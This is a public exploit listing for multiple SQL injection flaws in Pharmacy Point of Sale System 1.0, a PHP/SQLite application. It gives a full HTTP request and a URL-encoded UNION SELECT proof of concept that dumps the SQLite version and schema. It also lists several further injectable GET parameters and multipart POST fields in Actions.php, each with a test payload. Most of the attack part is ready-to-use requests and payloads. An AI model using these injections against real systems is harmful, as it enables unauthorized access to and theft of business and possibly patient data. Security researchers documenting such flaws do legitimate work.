pharmacy point of sale system 1.0 multiple sql injection (sqli)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability Code...
 Code...
				
# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) # Date: 28.09.2021 # Exploit Author: Murat # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip # Version: 1.0 # Tested on: Windows 10 # Pharmacy Point of Sale System v1.0 SQLi GET /pharmacy/view_product.php?id=-1 HTTP/1.1 Host: localhost Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6 Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Connection: close POC: https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1-- ----------------------------------------------------------------------- #Other parameters with sql injection vulnerability; ==> /pharmacy/?date_from=&date_to=1'"&page=sales_report ==> /pharmacy/?date_from=1'"&date_to=&page=sales_report ==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1 ==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true ==> /pharmacy/manage_product.php?id=-1' ==> POST /pharmacy/Actions.php?a=save_stock ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="supplier_id" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_id" 2'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="quantity" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="expiry_date" ==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id" 5'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_code" 94102'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="category_id" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="name" pHqghUme'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="price" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="description" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="status" 0'" ------------YWJkMTQzNDcw-- -
Pharmacy point of sale system 1.0 multiple sql injection (sqli) Vulnerability / Exploit Source : Pharmacy point of sale system 1.0 multiple sql injection (sqli)
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes